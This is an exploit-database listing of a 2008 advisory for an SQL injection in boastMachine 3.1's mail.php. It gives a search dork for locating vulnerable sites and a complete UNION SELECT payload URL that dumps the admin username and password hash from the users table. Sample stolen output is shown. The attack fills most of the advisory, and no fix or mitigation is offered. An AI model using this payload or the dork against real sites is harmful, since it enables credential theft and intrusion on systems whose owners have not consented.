[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

boastMachine <= 3.1 (mail.php id) SQL Injection Vulnerability

Author
Virangar Security
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2525
Category
web applications
Date add
21-01-2008
Platform
unsorted
=============================================================
boastMachine <= 3.1 (mail.php id) SQL Injection Vulnerability
=============================================================



########################################################################
#                                                                      #
#    ...:::::boastMachine <=3.1 SQL Injection Vulnerbility ::::....    #           
########################################################################

Virangar Security Team

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :x
-----------------------------------
dork: Powered by boastMachine v3.1
-----------------------------------
vuln:
http://localhost/bm/mail.php?id='/**/union/**/select/**/1,2,concat(user_login,char(58),user_pass),4/**/from/**/bmc_users/**/where/**/id=1/*&blog=[blog_id]
example:
http://localhost/bm/mail.php?id='/**/union/**/select/**/1,2,concat(user_login,char(58),user_pass),4/**/from/**/bmc_users/**/where/**/id=1/*&blog=1
-------------------------------------
you can see somting simillar to:
Send the post "swagger:e74c7cc56d033d32b8cb465c2bbc379b" to a friend
#############
'swagger' is admin user & 'e74c7cc56d033d32b8cb465c2bbc379b' is encoded admin password ;)
-------------------------------------
mybe other versions are Vulnerbil too :)



#  0day.today [2024-12-26]  #